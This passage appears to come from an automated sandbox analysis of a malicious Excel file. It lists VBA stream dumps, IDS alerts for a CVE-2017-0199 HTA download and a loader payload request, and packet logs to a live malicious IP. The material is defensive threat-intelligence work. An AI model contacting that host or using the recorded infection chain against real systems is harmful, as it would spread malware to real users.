Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	531
Entropy:	5.2648776810736235
Base64 Encoded:	True
Data ASCII:	I D = " { 5 5 2 E B 2 4 5 - 8 7 5 A - 4 F 2 E - 8 A 3 0 - 2 4 D 2 0 3 A 1 6 3 B 9 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 6 C 4 7 7 F A 8 9 0 6 1 C 0 A 1
Data Raw:	49 44 3d 22 7b 35 35 32 45 42 32 34 35 2d 38 37 35 41 2d 34 46 32 45 2d 38 41 33 30 2d 32 34 44 32 30 33 41 31 36 33 42 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	3.9944862472218134
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-12T21:43:20.077574+0100	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49162	107.172.44.175	80	TCP
2024-12-12T21:43:20.077725+0100	2024197	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)	1	107.172.44.175	80	192.168.2.22	49162	TCP
2024-12-12T21:43:24.722755+0100	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49164	107.172.44.175	80	TCP
2024-12-12T21:43:24.723202+0100	2024197	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)	1	107.172.44.175	80	192.168.2.22	49164	TCP
2024-12-12T21:43:31.051922+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.22	49165	107.172.44.175	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 21:43:16.836762905 CET	49161	443	192.168.2.22	172.67.163.184
Dec 12, 2024 21:43:16.836808920 CET	443	49161	172.67.163.184	192.168.2.22
Dec 12, 2024 21:43:16.836869001 CET	49161	443	192.168.2.22	172.67.163.184
Dec 12, 2024 21:43:16.842331886 CET	49161	443	192.168.2.22	172.67.163.184
Dec 12, 2024 21:43:16.842344046 CET	443	49161	172.67.163.184	192.168.2.22
Dec 12, 2024 21:43:18.070357084 CET	443	49161	172.67.163.184	192.168.2.22
Dec 12, 2024 21:43:18.070492983 CET	49161	443	192.168.2.22	172.67.163.184
Dec 12, 2024 21:43:18.075515032 CET	49161	443	192.168.2.22	172.67.163.184
Dec 12, 2024 21:43:18.075532913 CET	443	49161	172.67.163.184	192.168.2.22
Dec 12, 2024 21:43:18.075886011 CET	443	49161	172.67.163.184	192.168.2.22
Dec 12, 2024 21:43:18.075931072 CET	49161	443	192.168.2.22	172.67.163.184
Dec 12, 2024 21:43:18.153755903 CET	49161	443	192.168.2.22	172.67.163.184
Dec 12, 2024 21:43:18.199335098 CET	443	49161	172.67.163.184	192.168.2.22
Dec 12, 2024 21:43:18.829598904 CET	443	49161	172.67.163.184	192.168.2.22
Dec 12, 2024 21:43:18.829720974 CET	443	49161	172.67.163.184	192.168.2.22
Dec 12, 2024 21:43:18.829744101 CET	49161	443	192.168.2.22	172.67.163.184
Dec 12, 2024 21:43:18.829763889 CET	49161	443	192.168.2.22	172.67.163.184
Dec 12, 2024 21:43:18.834604979 CET	49161	443	192.168.2.22	172.67.163.184
Dec 12, 2024 21:43:18.834624052 CET	443	49161	172.67.163.184	192.168.2.22
Dec 12, 2024 21:43:18.845323086 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:18.965092897 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:18.965260983 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:18.965543985 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:19.085288048 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.077370882 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.077400923 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.077411890 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.077574015 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.077574968 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.077724934 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.077737093 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.077743053 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.077747107 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.077805996 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.078603983 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.078618050 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.078629017 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.078660011 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.078671932 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.088063002 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.197633028 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.197711945 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.197743893 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.197774887 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.201807976 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.201873064 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.269828081 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.269920111 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.269956112 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.269995928 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.274147034 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.274220943 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.274235964 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.274353027 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.282227993 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.282260895 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.282304049 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.282321930 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.290977955 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.291074038 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.291080952 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.291143894 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.298887968 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.298962116 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.298968077 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.299010038 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.307249069 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.307306051 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.307353973 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.307395935 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.315618038 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.315673113 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.315740108 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.315800905 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.324058056 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.324109077 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.324177027 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.324213028 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.332578897 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.332628012 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.332637072 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.332669973 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.341331005 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.341381073 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.341490984 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.341530085 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.349463940 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.349541903 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.349575996 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.349625111 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.389890909 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.389944077 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.389964104 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.390022993 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.461663961 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.461735010 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.461755991 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.461797953 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.464071035 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.464133024 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.464195967 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.464251041 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.468698978 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.468774080 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.468907118 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.468949080 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.473507881 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.473577976 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.473624945 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.473665953 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.478252888 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.478321075 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.478499889 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.478548050 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.482901096 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.482975006 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.483022928 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.483069897 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.487677097 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.487749100 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.487817049 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.487865925 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.492352009 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.492429018 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.492465019 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.492532015 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.497281075 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.497359991 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.497359037 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.497410059 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.501756907 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.501841068 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.501883984 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.501939058 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.506493092 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.506581068 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.506584883 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.506638050 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.511255980 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.511337996 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.511394024 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.511441946 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.515891075 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.515971899 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.516032934 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.516086102 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.520665884 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.520741940 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.520781994 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.520843983 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.524333000 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.524388075 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.524696112 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.524748087 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.528006077 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.528069019 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.528131962 CET	80	49162	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:20.528177977 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.632857084 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:20.632966995 CET	49162	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:21.364958048 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:21.365015030 CET	443	49163	104.21.34.183	192.168.2.22
Dec 12, 2024 21:43:21.365093946 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:21.374063969 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:21.374087095 CET	443	49163	104.21.34.183	192.168.2.22
Dec 12, 2024 21:43:22.642919064 CET	443	49163	104.21.34.183	192.168.2.22
Dec 12, 2024 21:43:22.642997026 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:22.647644043 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:22.647680998 CET	443	49163	104.21.34.183	192.168.2.22
Dec 12, 2024 21:43:22.647929907 CET	443	49163	104.21.34.183	192.168.2.22
Dec 12, 2024 21:43:22.647998095 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:22.740642071 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:22.783345938 CET	443	49163	104.21.34.183	192.168.2.22
Dec 12, 2024 21:43:23.365417957 CET	443	49163	104.21.34.183	192.168.2.22
Dec 12, 2024 21:43:23.365489960 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:23.365519047 CET	443	49163	104.21.34.183	192.168.2.22
Dec 12, 2024 21:43:23.365562916 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:23.365569115 CET	443	49163	104.21.34.183	192.168.2.22
Dec 12, 2024 21:43:23.365581989 CET	443	49163	104.21.34.183	192.168.2.22
Dec 12, 2024 21:43:23.365607023 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:23.365633965 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:23.368406057 CET	49163	443	192.168.2.22	104.21.34.183
Dec 12, 2024 21:43:23.368431091 CET	443	49163	104.21.34.183	192.168.2.22
Dec 12, 2024 21:43:23.386410952 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:23.506275892 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:23.506361961 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:23.506968975 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:23.626893997 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.722567081 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.722632885 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.722671032 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.722704887 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.722742081 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.722754955 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.722755909 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.722955942 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.722955942 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.723201990 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.723238945 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.723261118 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.723273993 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.723309040 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.723395109 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.723396063 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.723396063 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.723893881 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.723946095 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.729103088 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.843123913 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.843200922 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.843317032 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.843317032 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.847295046 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.847362995 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.914282084 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.914362907 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.914532900 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.914532900 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.918615103 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.918679953 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.918684006 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.918730021 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.926920891 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.927004099 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.929910898 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.929970026 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.930028915 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.930068970 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.938199997 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.938270092 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.938303947 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.938361883 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.946573019 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.946616888 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.946659088 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.946696997 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.954967022 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.955020905 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.955060005 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.955118895 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.963383913 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.963455915 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.963481903 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.963515043 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.971786976 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.971858978 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.971970081 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.972120047 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.980267048 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.980326891 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.980343103 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.980381012 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.988082886 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.988135099 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.988169909 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.988169909 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:24.995693922 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.995779991 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:24.995876074 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.034554005 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.034693003 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.106343031 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.106384039 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.106441975 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.106899977 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.108819962 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.108881950 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.108933926 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.108988047 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.113584995 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.113622904 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.113670111 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.113670111 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.118290901 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.118387938 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.118411064 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.118452072 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.122989893 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.123059034 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.123181105 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.123294115 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.127700090 CET	80	49164	107.172.44.175	192.168.2.22
